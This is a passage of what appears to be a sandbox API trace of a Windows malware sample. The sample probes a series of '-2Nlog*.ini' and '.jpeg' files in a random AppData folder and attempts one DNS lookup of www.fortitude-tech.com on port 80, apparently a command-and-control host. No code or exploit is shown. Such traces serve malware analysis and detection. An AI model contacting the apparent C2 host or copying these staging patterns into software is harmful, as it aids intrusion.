DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.346] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.346] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.347] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.347] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.347] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.347] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.347] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.347] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.347] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.347] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.347] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.347] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.347] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.347] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.347] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.347] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.348] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.348] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.348] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.348] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.348] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.348] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.348] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.348] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.348] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.348] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.348] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.348] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.348] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.349] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0222.349] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.349] getaddrinfo (in: pNodeName="www.fortitude-tech.com", pServiceName="80", pHints=0x8791f38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791f68 | out: ppResult=0x8791f68*=0x0) returned 11001 [0222.353] Sleep (dwMilliseconds=0x7d0) [0222.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.354] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.354] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0222.354] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.354] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.355] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.355] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.355] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.355] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.355] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.355] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.355] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.355] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.355] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.355] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.355] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.355] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.355] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.355] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.355] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.355] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.355] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.355] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.356] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0222.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0222.356] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0222.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0222.356] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, 